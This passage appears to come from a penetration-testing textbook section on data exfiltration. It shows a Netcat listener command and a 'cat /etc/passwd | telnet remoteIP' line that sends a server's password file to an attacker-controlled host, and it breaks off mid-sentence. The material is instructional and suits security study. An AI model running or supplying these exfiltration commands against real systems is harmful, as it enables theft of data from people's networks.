The unauthorized transfer of digital data from any environment is known as exfiltration of data (or extrusion of data). Once persistence is maintained on a compromised system, a set of tools can be utilized to exfiltrate data from highly secure environments.
In this section, we will explore different methods that attackers utilize to send files from internal networks to attacker-controlled systems.
Firstly, we will discuss some easy techniques to quickly grab files when access to compromised systems is time-limited. Attackers can simply open up a port using Netcat by running nc -lvp 2323 > Exfilteredfile
, and then run cat /etc/passwd | telnet remoteIP 2323
from the compromised Linux server.
This will display the entire contents of the etc/passwd
to the remote host, as shown in the following screenshot:
Another important and fairly simple technique used by attackers with access to any system on the network is to run...